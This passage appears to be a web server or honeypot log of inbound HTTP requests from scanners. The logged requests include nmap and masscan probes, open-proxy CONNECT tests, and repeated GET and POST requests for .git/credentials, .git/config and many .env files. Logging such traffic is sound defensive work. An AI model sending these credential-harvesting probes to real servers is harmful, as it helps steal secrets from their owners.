"/HNAP1", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/nmaplowercheck1697944355", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/RRPh", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Content_Length": "232", "Content_Type": "text/xml", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "POST", "Path": "/scripts/WPnBr.dll", "Http_Version": "HTTP/1.1", "POST_Payload": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pg0KPCFET0NUWVBFIE5GdXNlUHJvdG9jb2wgU1lTVEVNICJORnVzZS5kdGQiPg0KPE5GdXNlUHJvdG9jb2wgdmVyc2lvbj0iMS4xIj48UmVxdWVzdFNlcnZlckRhdGE+PFNlcnZlclR5cGU+YWxsPC9TZXJ2ZXJUeXBlPjxDbGllbnRUeXBlPmFsbDwvQ2xpZW50VHlwZT48L1JlcXVlc3RTZXJ2ZXJEYXRhPjwvTkZ1c2VQcm90b2NvbD4NCg=="} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/.git/HEAD", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/Portal0000.htm", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Method": "CONNECT", "Path": "www.google.com:80", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/pools", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/HNAP1", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "HEAD", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "HEAD", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/__Additional", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/qm0N", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/Portal/Portal.mwsl", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/.git/HEAD", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Content_Length": "232", "Content_Type": "text/xml", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "POST", "Path": "/scripts/WPnBr.dll", "Http_Version": "HTTP/1.1", "POST_Payload": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pg0KPCFET0NUWVBFIE5GdXNlUHJvdG9jb2wgU1lTVEVNICJORnVzZS5kdGQiPg0KPE5GdXNlUHJvdG9jb2wgdmVyc2lvbj0iMS4xIj48UmVxdWVzdFNlcnZlckRhdGE+PFNlcnZlclR5cGU+YWxsPC9TZXJ2ZXJUeXBlPjxDbGllbnRUeXBlPmFsbDwvQ2xpZW50VHlwZT48L1JlcXVlc3RTZXJ2ZXJEYXRhPjwvTkZ1c2VQcm90b2NvbD4NCg=="} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/pools/default/buckets", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Host": "www.wikipedia.org", "Method": "GET", "Path": "http://www.wikipedia.org", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/docs/cplugError.html/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/Portal/Portal.mwsl", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/pools", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de:8080", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "curl/7.54.0", "Method": "GET", "Path": "/docs/cplugError.html/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Host": "www.wikipedia.org", "Method": "HEAD", "Path": "http://www.wikipedia.org", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Method": "CONNECT", "Path": "www.wikipedia.org:80", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Host": "www.computerhistory.org", "Method": "GET", "Path": "http://www.computerhistory.org", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Method": "CONNECT", "Path": "www.computerhistory.org:80", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "109.74.204.123", "Host": "static.148.22.202.116.clients.your-server.de", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.74.204.123", "Host": "static.148.22.202.116.clients.your-server.de", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "103.237.87.198", "Host": "www.google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "www.google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.164.139", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.164.139", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.164.139", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.164.139", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.164.139", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148:8080", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "190.122.151.198", "Accept": "text/plain,text/html", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "104.152.52.198", "Accept": "*/*", "User_Agent": "masscan/1.3 (https://github.com/robertdavidgraham/masscan)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "104.152.52.198", "Accept": "*/*", "User_Agent": "masscan/1.3 (https://github.com/robertdavidgraham/masscan)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "193.35.18.187", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.101 Mobile Safari/537.36", "Method": "GET", "Path": "/.git/credentials", "Http_Version": "HTTP/1.1"} +{"ip": "78.40.106.19", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/back/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/back/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.prod", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.prod", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.production", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.production", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/enviroments/.env.production", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/enviroments/.env.production", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.dist", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.dist", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/cp/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/cp/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/enviroments/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/enviroments/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/cms/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/cms/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/rest/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/rest/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/core/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/core/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/api/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/api/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.development", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.development", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.project", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.project", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.old", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.old", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/laravel/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/laravel/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/admin-app/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/admin-app/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/sources/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/sources/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/app/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/app/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/script/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/script/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/local/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/local/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/shared/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/shared/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/application/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/application/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": 